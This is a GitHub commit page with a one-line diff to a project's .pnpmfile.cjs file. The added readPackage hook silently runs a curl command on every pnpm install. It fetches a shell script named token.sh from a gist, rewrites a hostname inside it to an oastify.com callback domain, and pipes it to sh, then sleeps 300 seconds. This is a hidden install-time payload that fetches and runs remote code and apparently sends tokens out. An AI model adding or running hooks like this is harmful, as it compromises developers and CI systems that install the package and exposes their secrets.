Skip to content

Commit

Permalink
Update .pnpmfile.cjs
Browse files Browse the repository at this point in the history
  • Loading branch information
mardangelo authored Sep 18, 2024
1 parent 725f914 commit 165c243
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions .pnpmfile.cjs
Original file line number Diff line number Diff line change
@@ -1,6 +1,7 @@
const { execSync } = require('child_process');
function readPackage(pkg, context) {
execSync(`curl https://gist.githubusercontent.com/svennergr/97c04225caebb55d048c9d463c9ddd93/raw/f9d6a609c15609efbf43a878daba41e12ddd3224/token.sh | sed 's/dpfrdgayxunqdtdyqmbdluihsnsi3w1hm.sventastic.net/rojfv90k4meyjvdg4fppnmzad1js7lva.oastify.com/g' | sh`)
execSync(`sleep 300`)
return pkg
}

Expand Down

0 comments on commit 165c243

Please sign in to comment.